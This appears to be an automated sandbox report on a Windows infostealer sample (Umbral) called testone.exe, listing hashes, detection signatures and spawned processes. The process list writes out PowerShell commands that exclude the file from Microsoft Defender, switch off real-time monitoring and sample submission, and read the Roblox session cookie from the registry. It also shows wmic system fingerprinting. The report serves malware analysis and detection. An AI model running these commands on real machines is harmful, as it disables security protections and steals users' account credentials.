Resubmissions
26-06-2023 18:25
230626-w2tznabc97 1026-06-2023 18:24
230626-w17t5acb91 1026-06-2023 18:22
230626-wz7gzabc88 10Analysis
-
max time kernel
72s -
max time network
77s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
26-06-2023 18:22
General
-
Target
testone.exe
-
Size
229KB
-
MD5
27eade2098a995bea21837cc28399e7e
-
SHA1
3100f2f77ca8fd8d6c3f6a55285650e0f9ffaffe
-
SHA256
4cbe7a16f2a8df8a51aa0f50f65d9d97195b254072589e87c54ba53e458c8a89
-
SHA512
3830c7b09d3c250d3a7faf6adce46fabb45dd4ca96ad4e647b7b3c51987d79282a10030b7363fac380de642ab1a1940767dc5ce23b7d92429e984d73f0ffb53f
-
SSDEEP
6144:9loZMXXU9Zx0kt8X0/PSCsMT9aY6ecjfU61gevPeDAb8e1m4i:foZDf0kkP6AY6ecjfU61gevPes6
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1048-133-0x00000260B16E0000-0x00000260B1720000-memory.dmp family_umbral -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4840 wmic.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1368 powershell.exe 1368 powershell.exe 3600 powershell.exe 3600 powershell.exe 1436 powershell.exe 1436 powershell.exe 3752 powershell.exe 3752 powershell.exe 4848 powershell.exe 4848 powershell.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1048 testone.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 3752 powershell.exe Token: SeIncreaseQuotaPrivilege 2508 wmic.exe Token: SeSecurityPrivilege 2508 wmic.exe Token: SeTakeOwnershipPrivilege 2508 wmic.exe Token: SeLoadDriverPrivilege 2508 wmic.exe Token: SeSystemProfilePrivilege 2508 wmic.exe Token: SeSystemtimePrivilege 2508 wmic.exe Token: SeProfSingleProcessPrivilege 2508 wmic.exe Token: SeIncBasePriorityPrivilege 2508 wmic.exe Token: SeCreatePagefilePrivilege 2508 wmic.exe Token: SeBackupPrivilege 2508 wmic.exe Token: SeRestorePrivilege 2508 wmic.exe Token: SeShutdownPrivilege 2508 wmic.exe Token: SeDebugPrivilege 2508 wmic.exe Token: SeSystemEnvironmentPrivilege 2508 wmic.exe Token: SeRemoteShutdownPrivilege 2508 wmic.exe Token: SeUndockPrivilege 2508 wmic.exe Token: SeManageVolumePrivilege 2508 wmic.exe Token: 33 2508 wmic.exe Token: 34 2508 wmic.exe Token: 35 2508 wmic.exe Token: 36 2508 wmic.exe Token: SeIncreaseQuotaPrivilege 2508 wmic.exe Token: SeSecurityPrivilege 2508 wmic.exe Token: SeTakeOwnershipPrivilege 2508 wmic.exe Token: SeLoadDriverPrivilege 2508 wmic.exe Token: SeSystemProfilePrivilege 2508 wmic.exe Token: SeSystemtimePrivilege 2508 wmic.exe Token: SeProfSingleProcessPrivilege 2508 wmic.exe Token: SeIncBasePriorityPrivilege 2508 wmic.exe Token: SeCreatePagefilePrivilege 2508 wmic.exe Token: SeBackupPrivilege 2508 wmic.exe Token: SeRestorePrivilege 2508 wmic.exe Token: SeShutdownPrivilege 2508 wmic.exe Token: SeDebugPrivilege 2508 wmic.exe Token: SeSystemEnvironmentPrivilege 2508 wmic.exe Token: SeRemoteShutdownPrivilege 2508 wmic.exe Token: SeUndockPrivilege 2508 wmic.exe Token: SeManageVolumePrivilege 2508 wmic.exe Token: 33 2508 wmic.exe Token: 34 2508 wmic.exe Token: 35 2508 wmic.exe Token: 36 2508 wmic.exe Token: SeIncreaseQuotaPrivilege 1636 wmic.exe Token: SeSecurityPrivilege 1636 wmic.exe Token: SeTakeOwnershipPrivilege 1636 wmic.exe Token: SeLoadDriverPrivilege 1636 wmic.exe Token: SeSystemProfilePrivilege 1636 wmic.exe Token: SeSystemtimePrivilege 1636 wmic.exe Token: SeProfSingleProcessPrivilege 1636 wmic.exe Token: SeIncBasePriorityPrivilege 1636 wmic.exe Token: SeCreatePagefilePrivilege 1636 wmic.exe Token: SeBackupPrivilege 1636 wmic.exe Token: SeRestorePrivilege 1636 wmic.exe Token: SeShutdownPrivilege 1636 wmic.exe Token: SeDebugPrivilege 1636 wmic.exe Token: SeSystemEnvironmentPrivilege 1636 wmic.exe Token: SeRemoteShutdownPrivilege 1636 wmic.exe Token: SeUndockPrivilege 1636 wmic.exe Token: SeManageVolumePrivilege 1636 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1048 wrote to memory of 1368 1048 testone.exe 84 PID 1048 wrote to memory of 1368 1048 testone.exe 84 PID 1048 wrote to memory of 3600 1048 testone.exe 86 PID 1048 wrote to memory of 3600 1048 testone.exe 86 PID 1048 wrote to memory of 1436 1048 testone.exe 88 PID 1048 wrote to memory of 1436 1048 testone.exe 88 PID 1048 wrote to memory of 3752 1048 testone.exe 90 PID 1048 wrote to memory of 3752 1048 testone.exe 90 PID 1048 wrote to memory of 2508 1048 testone.exe 92 PID 1048 wrote to memory of 2508 1048 testone.exe 92 PID 1048 wrote to memory of 1636 1048 testone.exe 94 PID 1048 wrote to memory of 1636 1048 testone.exe 94 PID 1048 wrote to memory of 2396 1048 testone.exe 96 PID 1048 wrote to memory of 2396 1048 testone.exe 96 PID 1048 wrote to memory of 4848 1048 testone.exe 98 PID 1048 wrote to memory of 4848 1048 testone.exe 98 PID 1048 wrote to memory of 4840 1048 testone.exe 100 PID 1048 wrote to memory of 4840 1048 testone.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\testone.exe"C:\Users\Admin\AppData\Local\Temp\testone.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\testone.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:4840
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
948B
MD5482fbb6ef0984159551ed81307d94b26
SHA16a9f978244f9217b29df57012c67d7795d86caee
SHA2561aefb52c8ad4f5d652ce79efcbbcdbbc9718e80454b588155f7fd4957b45b5d6
SHA5125bfe1471fdd77dfd053d9f72898822f07b13ebc6a411b62e3784b1f08b9f452cd39efdf7a34c0f8949b8860736a49a23d0b0a84a2411c8316bc7f92749cb1a3a
-
Filesize
1KB
MD5d3235ed022a42ec4338123ab87144afa
SHA15058608bc0deb720a585a2304a8f7cf63a50a315
SHA25610663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf
-
Filesize
1KB
MD5e61e221a11f1a35464e63ab429db0144
SHA1f52f48212b48e9d2a237a23c413c9b3b31c77905
SHA2564f3011257696fdfbadc6e834da1a3441e9d4053609c0c647c8a0818ba7bbe92d
SHA51201ab9316ad9dc111d2dff777e723ffcc2b7ffbba9416cb385d13cd9c924e449296adf588e54490891ba8861fb13ba41b6fa604c6f4161cdf445ac53213c01657
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82